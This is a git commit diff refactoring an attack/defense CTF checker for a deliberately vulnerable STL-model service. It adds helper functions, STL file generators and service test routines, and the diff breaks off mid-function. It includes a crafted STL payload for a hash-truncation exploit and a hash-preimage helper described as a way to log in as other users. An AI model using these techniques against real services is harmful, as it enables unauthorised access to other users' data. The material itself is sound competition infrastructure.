commit 7501a1d6c20581312eb37de883ab52e83e27c8fa
parent 0a00d31fa19062511e1208d1c037787476497e2f
Author: Louis Burda <quent.burda@gmail.com>
Date: Wed, 30 Jun 2021 22:52:52 +0200
refactor for enochecker3
Diffstat:
5 files changed, 761 insertions(+), 655 deletions(-)
diff --git a/checker/docker-compose.yml b/checker/docker-compose.yml
@@ -24,6 +24,8 @@ services:
# The python checkerlib requires a mongo db!
stldoctor-mongo:
image: mongo
+ ports:
+ - 27017:27017
volumes:
- ./data:/data/db
environment:
diff --git a/checker/local.sh b/checker/local.sh
@@ -0,0 +1,13 @@
+#!/bin/sh
+
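+# Spin up the checker's mongo container if it isn't already running,
+# point the checker at it via env vars, and run the checker locally.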
+if [ -z "$(docker ps | grep stldoctor-mongo)" ]; then
+ docker-compose up -d stldoctor-mongo
+fi
+
+export MONGO_ENABLED=1
+export MONGO_HOST=localhost
+export MONGO_PORT=27017
+export MONGO_USER=stldoctor_checker
+export MONGO_PASSWORD=stldoctor_checker
+
+python3 src/checker.py "$@"
diff --git a/checker/src/checker.py b/checker/src/checker.py
@@ -1,20 +1,36 @@
#!/usr/bin/env python3
-from enochecker import BaseChecker, BrokenServiceException, EnoException, run
-from enochecker.utils import SimpleSocket
+
import logging, math, os, random, re, socket, string, struct, subprocess, selectors, time
import numpy as np
-from io import BytesIO
-from stl import mesh
logging.getLogger("faker").setLevel(logging.WARNING)
-logging.getLogger("pwnlib").setLevel(logging.WARNING)
logging.getLogger("_curses").setLevel(logging.CRITICAL)
-rand = random.SystemRandom()
-
+from enochecker3 import *
+from enochecker3.utils import *
from faker import Faker
+from io import BytesIO
+from stl import mesh
+
+from typing import (
+ Any,
+ Optional,
+ Tuple,
+ Union
+)
+
+from logging import LoggerAdapter
+
+from asyncio import StreamReader, StreamWriter
-evil_file = b"""
+rand = random.SystemRandom()
+generic_alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-+.!"
+script_path = os.path.dirname(os.path.realpath(__file__))
+models_path = f"{script_path}/models"
+extra_models = [f"{models_path}/{path}" for path in os.listdir(models_path) if path.endswith(".stl")]
+prompt = b"\r$ "
+
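+# Evil ASCII STL with 0xff bytes embedded in its solid name, uploaded by the
+# flagstore 1 exploit for hash truncation via search.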
+search_truncation_payload = b"""
solid test\xff
facet normal 0 0 1.0
outer loop
@@ -26,76 +42,103 @@ solid test\xff
endsolid test\xff
"""
-generic_alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmopqrstuvwxyz0123456789-+.!"
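+# Checker app for the STLDoctor service listening on port 9090.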
+checker = Enochecker("STLDoctor", 9090)
+app = lambda: checker.app
-script_path = os.path.dirname(os.path.realpath(__file__))
-models_path = f"{script_path}/models"
-extra_models = [f"{models_path}/{path}" for path in \
- os.listdir(models_path) if path.endswith(".stl")]
+class Session:
+ def __init__(self, socket: AsyncSocket) -> None:
+ self.reader: StreamReader = socket[0]
+ self.writer: StreamWriter = socket[1]
+
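+ # Wrap write/readuntil so they transparently accept str or bytes;
+ # __get__ binds the helper methods below to the writer/reader instances.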
+ self.writer._write = self.writer.write
+ self.writer.write = Session.write.__get__(self.writer)
+
+ self.reader._readuntil = self.reader.readuntil
+ self.reader.readuntil = Session.readuntil.__get__(self.reader)
-def ensure_bytes(v):
+ def write(self: StreamWriter, data: Union[str, bytes]) -> None:
+ self._write(ensure_bytes(data))
+
+ def readuntil(self: StreamReader, data: Union[str, bytes]) -> bytes:
+ return self._readuntil(ensure_bytes(data))
+
+ async def __atexit__(self) -> None:
+ await self.close()
+
+ async def prepare(self) -> None:
+ await self.reader.readuntil(prompt)
+
+ async def close(self) -> None:
+ self.writer.write("exit\n")
+ await self.writer.drain()
+ await self.reader.readuntil("bye!") # ensure clean exit
+ self.writer.close()
+ await self.writer.wait_closed()
+
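+# Let the dependency injector construct a Session from the raw AsyncSocket.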
+@checker.register_dependency
+def _get_session(socket: AsyncSocket) -> Session:
+ return Session(socket)
+
+def ensure_bytes(v: Union[str,bytes]) -> bytes:
if type(v) == bytes:
return v
elif type(v) == str:
return v.encode()
else:
- raise BrokenServiceException("Tried to pass non str/bytes to bytes arg")
+ raise InternalErrorException("Tried to pass non str/bytes to bytes arg")
-def includes_all(resp, targets):
+def includes_all(resp: bytes, targets: Tuple[bytes, ...]) -> bool:
for m in targets:
if ensure_bytes(m) not in resp:
return False
return True
-def includes_any(resp, targets):
+def includes_any(resp: bytes, targets: Tuple[bytes, ...]) -> bool:
for m in targets:
if ensure_bytes(m) in resp:
return True
return False
-def fakeid():
- fake = Faker(["en_US"])
- idstr = bytes([ord(c) for c in fake.name().replace(" ","") if c in generic_alphabet][:12]).ljust(10, b".")
- idstr += bytes([ord(rand.choice(generic_alphabet)) for i in range(8)])
- return idstr
+def fakeid(havoc = False) -> bytes:
+ if havoc:
+ idlen = rand.randint(10, 40)
+ return bytes([rand.randint(32, 127) for i in range(idlen)])
+ else:
+ fake = Faker(["en_US"])
+ idstr = bytes([ord(c) for c in fake.name().replace(" ","") if c in generic_alphabet][:12]).ljust(10, b".")
+ idstr += bytes([ord(rand.choice(generic_alphabet)) for i in range(8)])
+ return idstr
-def havocid():
- idlen = rand.randint(10, 40)
- return bytes([rand.randint(32, 127) for i in range(idlen)])
+def fakeids(n: int, **kwargs) -> Tuple[bytes, ...]:
+ return tuple(fakeid(**kwargs) for i in range(n))
-def approx_equal(f1, f2, precision = 2):
+def approx_equal(f1: float, f2: float, precision: int = 2) -> bool:
return round(f1, precision) == round(f2, precision)
-def reverse_hash(hashstr):
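+# Shell out to the revhash helper to brute-force a preimage of the service's
+# hash; used by the flagstore 2 exploit to log in as other users.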
+def reverse_hash(hashstr: Union[str, bytes]) -> bytes:
if type(hashstr) is bytes:
hashstr = hashstr.decode()
data = subprocess.check_output([f"{script_path}/revhash/revhash", hashstr])[:-1]
if data == b"":
- raise BrokenServiceException(f"Failed to find hash preimage of {hashstr}")
+ raise InternalErrorException(f"Failed to find hash preimage of {hashstr}")
return data
-def check_line(conn, context):
- line = conn.recvline()
- if b"ERR:" in line:
- raise BrokenServiceException(f"{context}: Unexpected error message\n")
- return line
-
-def parse_int(intstr):
+def parse_int(intstr: Union[str, bytes]) -> Optional[int]:
try:
return int(intstr)
except:
return None
-def parse_float(floatstr):
+def parse_float(floatstr: Union[str, bytes]) -> Optional[float]:
try:
return float(floatstr)
except:
return None
-def has_alph(data, alph):
+def has_alph(data: Union[str, bytes], alph: Union[str, bytes]) -> bool:
return len([v for v in data if v not in alph]) == 0
-def assert_match(data, pattern, exception):
+def assert_match(data: bytes, pattern: bytes, exception: Exception) -> bytes:
rem = re.search(pattern, data)
if rem is None:
raise exception(f"Expected pattern {pattern} to match {data}")
@@ -103,640 +146,688 @@ def assert_match(data, pattern, exception):
return rem.group(1)
return rem.group(0)
-class STLDoctorChecker(BaseChecker):
- service_name = "stldoctor"
- port = 9090
+def genfile_ascii(solidname: Union[str, bytes], malformed: Optional[int] = None) -> bytes:
+ indent = bytes([rand.choice(b"\t ") for i in range(rand.randint(1, 4))])
+ solidname = ensure_bytes(solidname)
+ facet_count = rand.randint(4, 30)
- flag_variants = 2
- noise_variants = 2
- havoc_variants = 17
- exploit_variants = 2
+ if len(solidname) != 0:
+ content = b"solid " + solidname + b"\n"
+ else:
+ content = b"solid\n"
- prompt = b"\r$ "
+ for fi in range(facet_count):
+ # MALFORM 1: wrong keyword
+ if malformed == 1:
+ content += indent * 1 + b"facet nornal "
+ else:
+ content += indent * 1 + b"facet normal "
- # HELPER FUNCS #
+ vs = [[rand.random() for i in range(3)] for k in range(3)]
+ norm = np.cross(np.subtract(vs[1], vs[0]), np.subtract(vs[2],vs[0]))
+ norm = norm / np.linalg.norm(norm)
- def querydb(self, *args):
- vals = []
- for arg in args:
- try:
- val: str = self.chain_db[arg]
- except KeyError as ex:
- raise BrokenServiceException(f"Invalid db contents, missing: {arg}")
- vals.append(val)
- return vals
+ content += " ".join([f"{v:.2f}" for v in norm]).encode() + b"\n"
+
+ # MALFORM 2: wrong keyword case
+ if malformed == 2:
+ content += indent * 2 + b"outer lOop\n"
+ else:
+ content += indent * 2 + b"outer loop\n"
- def postdb(self, **kwdict):
- self.chain_db = kwdict
+ for i in range(3):
+ content += indent * 3 + b"vertex " + " ".join([f"{v:.2f}" for v in vs[i]]).encode() + b"\n"
- def genfile_ascii(self, solidname, malformed = None):
- indent = bytes([rand.choice(b"\t ") for i in range(rand.randint(1, 4))])
- solidname = ensure_bytes(solidname)
- facet_count = rand.randint(4, 30)
+ content += indent * 2 + b"endloop\n"
+ content += indent + b"endfacet\n"
- if len(solidname) != 0:
- content = b"solid " + solidname + b"\n"
+ # MALFORM 3: no endsolid keyword
+ if malformed != 3:
+ if solidname != b"":
+ content += b"endsolid " + solidname + b"\n"
else:
- content = b"solid\n"
+ content += b"endsolid\n"
- for fi in range(facet_count):
- # MALFORM 1: wrong keyword
- if malformed == 1:
- content += indent * 1 + b"facet nornal "
- else:
- content += indent * 1 + b"facet normal "
+ return content
- vs = [[rand.random() for i in range(3)] for k in range(3)]
- norm = np.cross(np.subtract(vs[1], vs[0]), np.subtract(vs[2],vs[0]))
- norm = norm / np.linalg.norm(norm)
+def genfile_bin(solidname: Union[str, bytes], malformed: Optional[int] = None) -> bytes:
+ solidname = ensure_bytes(solidname)
+ facet_count = rand.randint(4, 30)
- content += " ".join([f"{v:.2f}" for v in norm]).encode() + b"\n"
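+ # Binary STL layout: 80-byte header, little-endian uint32 facet count,
+ # then 50 bytes per facet (normal and 3 vertices as floats, plus 2 attribute bytes).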
+ if len(solidname) > 78:
+ raise InternalErrorException("Solidname to embed in header is larger than header itself")
+ if solidname != b"":
+ content = b"#" + solidname.ljust(78, b"\x00") + b"\x00"
+ else:
+ content = b"#" + b"\x00" * 79
- # MALFORM 2: wrong keyword case
- if malformed == 2:
- content += indent * 2 + b"outer lOop\n"
- else:
- content += indent * 2 + b"outer loop\n"
+ # MALFORM 1: specify more facets than are in the file
+ if malformed == 1:
+ content += struct.pack("<I", facet_count + rand.randint(3, 7))
+ else:
+ content += struct.pack("<I", facet_count)
+
+ for fi in range(facet_count):
+ vs = [[rand.random() for i in range(3)] for k in range(3)]
+ norm = np.cross(np.subtract(vs[1], vs[0]), np.subtract(vs[2],vs[0]))
+
+ # MALFORM 2: invalid float for norm / vec
+ if malformed == 2:
+ norm[rand.randint(0,2)] = math.nan
+ vs[rand.randint(0,2)][rand.randint(0,2)] = math.inf
+ for i in range(3):
+ content += struct.pack("<f", norm[i])
+ for k in range(3):
+ for i in range(3):
+ content += struct.pack("<f", vs[k][i])
+ content += b"\x00\x00"
+
+ # MALFORM 3: add extra data to the end of the file
+ if malformed == 3:
+ content += bytes([rand.randint(0, 255) for i in range(30)])
+
+ return content
+
+def genfile(solidname: Union[str, bytes], filetype: str, malformed: Optional[int] = None) -> bytes:
+ if filetype == "ascii":
+ return genfile_ascii(solidname, malformed = malformed)
+ elif filetype == "bin":
+ return genfile_bin(solidname, malformed = malformed)
+ elif filetype == "garbage-tiny":
+ return bytes([ord(rand.choice(generic_alphabet)) for i in range(rand.randint(3, 8))])
+ elif filetype == "garbage":
+ return bytes([ord(rand.choice(generic_alphabet)) for i in range(rand.randint(100, 300))])
+ else:
+ raise InternalErrorException("Invalid file type supplied")
+def parse_stlinfo(stlfile: bytes) -> Any:
+ fakefile = BytesIO()
+ fakefile.write(stlfile)
+ fakefile.seek(0)
+ try:
+ name, data = mesh.Mesh.load(fakefile)
+ meshinfo = mesh.Mesh(data, True, name=name, speedups=True)
+ except Exception as e:
+ raise InternalErrorException(f"Unable to parse generated STL file: {e}")
+ bmin = [math.inf for i in range(3)]
+ bmax = [-math.inf for i in range(3)]
+ if len(meshinfo.points) == 0:
+ raise InternalErrorException("Parsed STL mesh has 0 points!")
+ for p in meshinfo.points:
+ for k in range(3):
for i in range(3):
- content += indent * 3 + b"vertex " + " ".join([f"{v:.2f}" for v in vs[i]]).encode() + b"\n"
+ bmin[k] = min(bmin[k], float(p[3*i+k]))
+ bmax[k] = max(bmax[k], float(p[3*i+k]))
+ info = {
+ "points": meshinfo.points,
+ "bb_origin": bmin,
+ "bb_size": [bmax[i] - bmin[i] for i in range(3)],
+ "size": len(stlfile),
+ "triangle_count": len(meshinfo.points)
+ }
+ return info
+
+async def getdb(db: ChainDB, key: str) -> Tuple[Any, ...]:
+ try:
+ return await db.get(key)
+ except KeyError:
+ raise MumbleException("Could not retrieve necessary info for service interaction")
+
+# SERVICE FUNCTIONS #
+
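+# Log in with authstr; returns True if the user already existed
+# ("Welcome back"), False for a new user, or None on error when check is False.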
+async def do_auth(session: Session, logger: LoggerAdapter, authstr: bytes, check: bool = True) -> Optional[bool]:
+ authstr = ensure_bytes(authstr)
+ logger.debug(f"Logging in with {authstr}")
+ session.writer.write("auth\n")
+ session.writer.write(authstr + b"\n")
+ await session.writer.drain()
+
+ # Check for errors
+ resp = await session.reader.readline()
+ if b"ERR:" in resp:
+ if check:
+ logger.critical(f"Failed to login with {authstr}:\n{resp}")
+ raise MumbleException("Authentication not working properly")
+ return None
- content += indent * 2 + b"endloop\n"
- content += indent + b"endfacet\n"
+ # Also check success message
+ resp += await session.reader.readuntil(prompt)
+ if b"Success!" not in resp:
+ logger.critical(f"Login with pass {authstr} failed")
+ raise MumbleException("Authentication not working properly")
- # MALFORM 3: no endsolid keyword
- if malformed != 3:
- if solidname != b"":
- content += b"endsolid " + solidname + b"\n"
- else:
- content += b"endsolid\n"
+ return b"Welcome back" in resp
- return content
+async def do_list(session: Session, logger: LoggerAdapter, check: bool = True) -> Optional[bytes]:
+ session.writer.write("list\n")
+ await session.writer.drain()
+ resp = await session.reader.readuntil(prompt)
- def genfile_bin(self, solidname, malformed = None):
- solidname = ensure_bytes(solidname)
- facet_count = rand.randint(4, 30)
+ # Check for errors
+ if b"ERR:" in resp and b">> " not in resp:
+ if check:
+ logger.critical(f"Failed to list private files:\n{resp}")
+ raise MumbleException("File listing not working properly")
+ return None
- if len(solidname) > 78:
- raise EnoException("Solidname to embed in header is larger than header itself")
- if solidname != "":
- content = b"#" + solidname.ljust(78, b"\x00") + b"\x00"
- else:
- content = b"#" + b"\x00" * 79
+ return resp
+
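+# Upload an STL file under modelname and return the model ID parsed from
+# the service's response.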
+async def do_upload(session: Session, logger: LoggerAdapter, modelname: Union[str, bytes], stlfile: bytes, check: bool = True) -> Optional[bytes]:
+ modelname = ensure_bytes(modelname)
+
+ # Upload file
+ logger.debug(f"Uploading model with name {modelname}")
+ session.writer.write("upload\n")
+ session.writer.write(modelname + b"\n")
+ session.writer.write(f"{len(stlfile)}\n")
+ session.writer.write(stlfile)
+ await session.writer.drain()
+
+ # Check for errors
+ # TODO improve by reading responses separately
+ resp = await session.reader.readline()
+ resp += await session.reader.readline()
+ if b"ERR:" in resp:
+ if check:
+ logger.critical(f"Failed to upload model {modelname}:\n{resp}")
+ raise MumbleException("File upload not working properly")
+ await session.reader.readuntil(prompt)
+ return None
- # MALFORM 1: specify more facets than are in the file
- if malformed == 1:
- content += struct.pack("<I", facet_count + rand.randint(3, 7))
- else:
- content += struct.pack("<I", facet_count)
+ # Parse ID
+ try:
+ modelid = resp.rsplit(b"!", 1)[0].split(b"with ID ", 1)[1]
+ if modelid == b"": raise Exception
+ except:
+ logger.critical(f"Invalid response during upload of {modelname}:\n{resp}")
+ raise MumbleException("File upload not working properly")
- for fi in range(facet_count):
- vs = [[rand.random() for i in range(3)] for k in range(3)]
- norm = np.cross(np.subtract(vs[1], vs[0]), np.subtract(vs[2],vs[0]))
+ await session.reader.readuntil(prompt)
+ return modelid
- # MALFORM 2: invalid float for norm / vec
- if malformed == 2:
- norm[rand.randint(0,2)] = math.nan
- vs[rand.randint(0,2)][rand.randint(0,2)] = math.inf
- for i in range(3):
- content += struct.pack("<f", norm[i])
- for k in range(3):
- for i in range(3):
- content += struct.pack("<f", vs[k][i])
- content += b"\x00\x00"
-
- # MALFORM 3: add extra data to the end of the file
- if malformed == 3:
- content += bytes([rand.randint(0, 255) for i in range(30)])
-
- return content
-
- def genfile(self, solidname, filetype, malformed = None):
- if filetype == "ascii":
- return self.genfile_ascii(solidname, malformed = malformed)
- elif filetype == "bin":
- return self.genfile_bin(solidname, malformed = malformed)
- elif filetype == "garbage-tiny":
- return bytes([ord(rand.choice(generic_alphabet)) for i in range(rand.randint(3, 8))])
- elif filetype == "garbage":
- return bytes([ord(rand.choice(generic_alphabet)) for i in range(rand.randint(100, 300))])
- else:
- raise EnoException("Invalid file type supplied")
-
- def parse_stlinfo(self, stlfile):
- fakefile = BytesIO()
- fakefile.write(stlfile)
- fakefile.seek(0)
- try:
- name, data = mesh.Mesh.load(fakefile)
- meshinfo = mesh.Mesh(data, True, name=name, speedups=True)
- except Exception as e:
- raise BrokenServiceException(f"STL file parsing failed: {e}")
- bmin = [math.inf for i in range(3)]
- bmax = [-math.inf for i in range(3)]
- if len(meshinfo.points) == 0:
- raise EnoException("Parsed STL mesh has 0 points!")
- for p in meshinfo.points:
- for k in range(3):
- for i in range(3):
- bmin[k] = min(bmin[k], float(p[3*i+k]))
- bmax[k] = max(bmax[k], float(p[3*i+k]))
- info = {
- "points": meshinfo.points,
- "bb_origin": bmin,
- "bb_size": [bmax[i] - bmin[i] for i in range(3)],
- "size": len(stlfile),
- "triangle_count": len(meshinfo.points)
- }
- return info
-
- def openconn(self):
- conn = self.connect()
- resp = conn.recvuntil(b'\n' + self.prompt)
- return conn
-
- def closeconn(self, conn):
- self.debug("Sending exit command")
- conn.write("exit\n")
- conn.recvuntil("bye!") # ensure clean exit
- conn.close()
-
- def do_auth(self, conn, authstr, check = True):
- authstr = ensure_bytes(authstr)
- self.debug(f"Logging in with {authstr}")
- conn.write("auth\n")
- conn.write(authstr + b"\n")
-
- # Check for errors
- resp = conn.recvline()
- if b"ERR:" in resp:
- if check:
- raise BrokenServiceException(f"Failed to login with {authstr}:\n{resp}")
- return None
-
- # Also check success message
- resp += conn.recvuntil(self.prompt)
- if b"Success!" not in resp:
- raise BrokenServiceException(f"Login with pass {authstr} failed")
- return b"Welcome back" in resp
-
- def do_list(self, conn, check = True):
- conn.write("list\n")
- resp = conn.recvuntil(self.prompt)
-
- # Check for errors
- if b"ERR:" in resp and b">> " not in resp:
- if check:
- raise BrokenServiceException(f"Failed to list private files:\n{resp}")
- return None
-
- return resp
-
- def do_upload(self, conn, modelname, stlfile, check = True):
- modelname = ensure_bytes(modelname)
-
- # Upload file
- self.debug(f"Uploading model with name {modelname}")
- conn.write("upload\n")
- conn.write(modelname + b"\n")
- conn.write(f"{len(stlfile)}\n")
- conn.write(stlfile)
-
- # Check for errors
- resp = conn.recvline() + conn.recvline()
- if b"ERR:" in resp:
- if check:
- raise BrokenServiceException(f"Failed to upload model {modelname}:\n{line}")
- conn.recvuntil(self.prompt)
- return None
-
- # Parse ID
- try:
- modelid = resp.rsplit(b"!", 1)[0].split(b"with ID ", 1)[1]
- if modelid == b"": raise Exception
- except:
- raise BrokenServiceException(f"Invalid response during upload of {modelname}:\n{line}")
-
- conn.recvuntil(self.prompt)
- return modelid
-
- def do_search(self, conn, modelname, download = False, check = True):
- modelname = ensure_bytes(modelname)
-
- # Initiate download
- self.debug(f"Retrieving model with name {modelname}")
- conn.write(b"search " + modelname + b"\n")
- conn.write("0\n") # first result
- conn.write("y\n" if download else "n\n")
- conn.write("q\n") # quit
-
- # Check if an error occured
- line = conn.recvline()
- if b"ERR:" in line:
- if check:
- raise BrokenServiceException(f"Failed to retrieve model {modelname}:\n{line}")
- if b"Couldn't find a matching scan result" in line:
- # collect all the invalid commands sent after (hacky)
- conn.recvuntil(self.prompt)
- conn.recvuntil(self.prompt)
- conn.recvuntil(self.prompt)
- conn.recvuntil(self.prompt)
- return None
-
- # Recv until end of info box
- fileinfo = line + conn.recvuntil("================== \n")
-
- stlfile = b""
- if download: # Parse file contents
- conn.recvuntil(b"Here you go.. (")
- resp = conn.recvuntil(b"B)\n")[:-3]
- size = parse_int(resp)
- if size is None:
- raise BrokenServiceException(f"Received invalid download size, response:\n{resp}")
-
- self.debug(f"Download size: {size}")
- stlfile = conn.recvn(size)
-
- conn.recvuntil(self.prompt)
- return fileinfo, stlfile
-
- # CHECK WRAPPERS #
-
- def check_listed(self, conn, includes):
- resp = self.do_list(conn, check = True)
- if not includes_all(resp, includes):
- raise BrokenServiceException(f"Failed to find {includes} in listing:\n{resp}")
- return resp
-
- def check_not_listed(self, conn, excludes, fail = False):
- resp = self.do_list(conn, check = False)
- if fail and resp:
- raise BrokenServiceException(f"Expected list to fail, but returned:\n{resp}")
- if not fail and not resp:
- raise BrokenServiceException(f"List failed unexpectedly:\n{resp}")
- if resp and includes_any(resp, excludes):
- raise BrokenServiceException(f"Unexpectedly found one of {excludes} in listing:\n{resp}")
- return resp
-
- def check_in_search(self, conn, modelname, includes, download = False):
- info, stlfile = self.do_search(conn, modelname, download, check = True)
- if not includes_all(info + stlfile, includes):
- raise BrokenServiceException(f"Retrieved info for {modelname} is missing {includes}: {resp}")
- return info, stlfile
-
- def check_not_in_search(self, conn, modelname, excludes, download = False, fail = False):
- resp = self.do_search(conn, modelname, download, check = False)
- if resp:
- combined = resp[0]+resp[1]
- if fail and resp:
- raise BrokenServiceException("Search for {modelname} succeeded unexpectedly:\n{combined}")
- if not fail and not resp:
- raise BrokenServiceException(f"Search for {modelname} failed unexpectedly:\n{resp}")
- if resp and includes_any(resp[0] + resp[1], excludes):
- raise BrokenServiceException(f"Unexpectedly {modelname} info contains one of {includes}: {combined}")
- return resp
-
- def check_hash(self, hashstr):
- if not has_alph(hashstr, b"0123456789abcdef"):
- raise BrokenServiceException("Hash is not a hexadecimal number")
-
- def check_stlinfo(self, resp, ref_info, ref_modelid = None,
- ref_modelname = None, ref_solidname = None):
- size = parse_int(assert_match(resp, b"File Size: (.*)\n", BrokenServiceException))
- if not size or size != ref_info["size"]:
- raise BrokenServiceException(f"STL info returned no / invalid file size: {size} != {ref_info['size']}")
-
- triangle_count = parse_int(assert_match(resp, b"Triangle Count: (.*)\n", BrokenServiceException))
- if not triangle_count or triangle_count != ref_info["triangle_count"]:
- raise BrokenServiceException(f"STL info returned no / invalid triangle count: {triangle_count} != {ref_info['triangle_count']}")
-
- bb_size_str = assert_match(resp, b"Bounding Box Size: (.*)\n", BrokenServiceException)
- bb_size = [parse_float(v) for v in bb_size_str.split(b" x ")]
- if None in bb_size:
- raise BrokenServiceException(f"STL info returned invalid bounding box size: {bb_size_str}")
- if False in [approx_equal(bb_size[i], ref_info["bb_size"][i]) for i in range(3)]:
- raise BrokenServiceException(f"Bounding box size doesnt match: (REF) {ref_info['bb_size']} {bb_size}")
-
- bb_origin_str = assert_match(resp, b"Bounding Box Origin: (.*)\n", BrokenServiceException)
- bb_origin = [parse_float(v) for v in bb_origin_str.split(b" x ")]
- if None in bb_origin:
- raise BrokenServiceException(f"STL info returned invalid bounding box origin: {bb_origin_str}")
- if False in [approx_equal(bb_origin[i], ref_info["bb_origin"][i]) for i in range(3)]:
- raise BrokenServiceException(f"Bounding box origin doesnt match: (REF) {ref_info['bb_origin']} {bb_origin}")
-
- triangle_count = parse_float(assert_match(resp, b"Triangle Count: (.*)\n", BrokenServiceException))
- if triangle_count is None or triangle_count != ref_info["triangle_count"]:
- raise BrokenServiceException(f"Triangle count {triangle_count} doesnt match expected: {ref_info['triangle_count']}")
-
- if ref_modelname:
- modelname = assert_match(resp, b"Model Name: (.*)\n", BrokenServiceException)
- if modelname != ref_modelname:
- raise BrokenServiceException(f"Got modelname {modelname}, expected {ref_modelname}")
-
- if ref_modelid:
- modelid = assert_match(resp, b"Model ID: (.*)\n", BrokenServiceException)
- if modelid != ref_modelid:
- raise BrokenServiceException(f"Got modelid {modelid}, expected {ref_modelid}")
-
- if ref_solidname:
- solidname = assert_match(resp, b"Solid Name: (.*)\n", BrokenServiceException)
- if solidname != ref_solidname:
- raise BrokenServiceException(f"Got solidname {solidname}, expected {ref_solidname}")
-
-
- # TEST METHODS #
-
- def test_good_upload(self, filetype, register):
- # ASCII Solidname cant be havocid since it might mess with parsing
- solidname = fakeid() if filetype == "ascii" else havocid()
- modelname = havocid()
- authstr = havocid()
- stlfile = self.genfile(solidname, filetype)
-
- # Calculate properties to test response against
- ref_info = self.parse_stlinfo(stlfile)
-
- # Create new session and user and upload file
- conn = self.openconn()
- if register:
- self.do_auth(conn, authstr)
- modelid = self.do_upload(conn, modelname, stlfile)
- self.check_hash(modelid)
- expected = [modelname, solidname, stlfile, modelid]
- info, stlfile = self.check_in_search(conn, modelname, expected, download = True)
- self.check_stlinfo(info, ref_info, ref_modelname = modelname,
- ref_modelid = modelid, ref_solidname = solidname)
- if register:
- resp = self.check_listed(conn, [modelname, modelid + b"-"])
- self.closeconn(conn)
-
- # Try getting file from a new session
- conn = self.openconn()
- if register:
- self.check_not_in_search(conn, modelname, expected, download = True, fail = True)
- self.do_auth(conn, authstr)
- info, stlfile = self.check_in_search(conn, modelname, expected, download = True)
- self.check_stlinfo(info, ref_info, ref_modelname = modelname,
- ref_modelid = modelid, ref_solidname = solidname)
- self.check_listed(conn, [modelname, modelid + b"-"])
- else:
- info, stlfile = self.check_in_search(conn, modelname, expected, download = True)
- self.check_stlinfo(info, ref_info, ref_modelname = modelname,
- ref_modelid = modelid, ref_solidname = solidname)
-
- self.closeconn(conn)
-
- def test_bad_upload(self, filetype, variant):
- stlfile = self.genfile(fakeid(), filetype, malformed = variant)
-
- conn = self.openconn()
- if self.do_upload(conn, fakeid(), stlfile, check = False):
- raise BrokenServiceException(f"Able to upload malformed file:\n{stlfile}")
- self.closeconn(conn)
-
- def test_search(self, registered = False):
- solidname = fakeid()
- modelname = fakeid()
- modelname2 = fakeid()
- authstr = fakeid()
- stlfile = self.genfile(solidname, "bin")
-
- conn = self.openconn()
- if registered:
- self.do_auth(conn, authstr)
- modelid = self.do_upload(conn, modelname, stlfile)
- self.check_not_in_search(conn, modelname2, [modelname, modelid],
- download = True, fail = True)
- self.check_in_search(conn, modelname, [modelname, modelid], download = True)
- self.closeconn(conn)
-
- def test_list(self, registered = False):
- solidname = fakeid()
- modelname = fakeid()
- authstr = fakeid()
- authstr2 = fakeid()
- stlfile = self.genfile(solidname, "bin")
-
- conn = self.openconn()
- self.do_auth(conn, authstr)
- modelid = self.do_upload(conn, modelname, stlfile)
- self.check_listed(conn, [modelname, modelid + b"-"])
- self.closeconn(conn)
-
- if registered:
- conn = self.openconn()
- if self.do_auth(conn, authstr2):
- raise BrokenServiceException("New authstr {authstr2} has user dir")
- self.check_not_listed(conn, [modelid, modelname])
- self.closeconn(conn)
- else:
- conn = self.openconn()
- self.check_not_listed(conn, [modelid, modelname], fail = True)
- self.closeconn(conn)
-
- # CHECKER METHODS #
-
- def putflag(self): # type: () -> None
- if self.variant_id in (0, 1):
- modelname = fakeid()
- types = ["ascii", "bin"]
- registered = (self.variant_id == 1)
- stlfile = self.genfile(self.flag, types[self.variant_id])
- authstr = fakeid() if registered else ""
-
- conn = self.openconn()
- if registered:
- self.do_auth(conn, authstr)
- modelid = self.do_upload(conn, modelname, stlfile)
- self.closeconn(conn)
-
- self.postdb(modelid = modelid, modelname = modelname, authstr = authstr)
- else:
- raise EnoException(f"Invalid putflag variant ({self.variant_id}) provided")
-
- def getflag(self): # type: () -> None
- if self.variant_id in (0, 1):
- modelid, modelname, authstr = self.querydb("modelid", "modelname", "authstr")
- registered = (self.variant_id == 1)
-
- conn = self.openconn()
- if registered:
- self.do_auth(conn, authstr)
- info, stlfile = self.do_search(conn, modelname, download = True)
- if self.flag.encode() not in info + stlfile:
- raise BrokenServiceException(f"Flag {self.flag} not found in search:\n{info}\n{stlfile}")
- self.closeconn(conn)
- else:
- raise EnoException(f"Invalid getflag variant ({self.variant_id}) provided")
-
- def putnoise(self): # type: () -> None
- if self.variant_id in (0, 1):
- modelname = fakeid()
- solidname = fakeid()
- types = ["bin", "ascii"]
- registered = (self.variant_id == 1)
- authstr = fakeid() if registered else ""
- stlfile = self.genfile(solidname, types[self.variant_id])
-
- conn = self.openconn()
- if registered:
- self.do_auth(conn, authstr)
- modelid = self.do_upload(conn, modelname, stlfile)
- self.closeconn(conn)
-
- self.postdb(modelid = modelid, modelname = modelname,
- solidname = solidname, stlfile = stlfile, authstr = authstr)
- else:
- raise EnoException(f"Invalid putnoise variant ({self.variant_id}) provided")
-
- def getnoise(self): # type: () -> None
- if self.variant_id in (0, 1):
- modelid, modelname, solidname, stlfile, authstr \
- = self.querydb("modelid", "modelname", "solidname", "stlfile", "authstr")
- registered = (self.variant_id == 1)
- expected = [modelname, solidname, stlfile, modelid]
-
- conn = self.openconn()
- if registered:
- self.do_auth(conn, authstr)
- self.check_in_search(conn, modelname, expected, download = True)
- self.closeconn(conn)
- else:
- raise EnoException(f"Invalid noise variant ({self.variant_id}) provided")
-
- def havoc(self): # type: () -> None
- if self.variant_id == 0:
- self.test_good_upload("ascii", False)
- elif self.variant_id == 1:
- self.test_good_upload("bin", False)
- elif self.variant_id == 2:
- self.test_good_upload("ascii", True)
- elif self.variant_id == 3:
- self.test_good_upload("bin", True)
- elif self.variant_id == 4:
- self.test_bad_upload("ascii", variant = 1)
- elif self.variant_id == 5:
- self.test_bad_upload("ascii", variant = 2)
- elif self.variant_id == 6:
- self.test_bad_upload("ascii", variant = 3)
- elif self.variant_id == 7:
- self.test_bad_upload("bin", variant = 1)
- elif self.variant_id == 8:
- self.test_bad_upload("bin", variant = 2)
- elif self.variant_id == 9:
- self.test_bad_upload("bin", variant = 3)
- elif self.variant_id == 10:
- self.test_bad_upload("garbage", variant = 1)
- elif self.variant_id == 11:
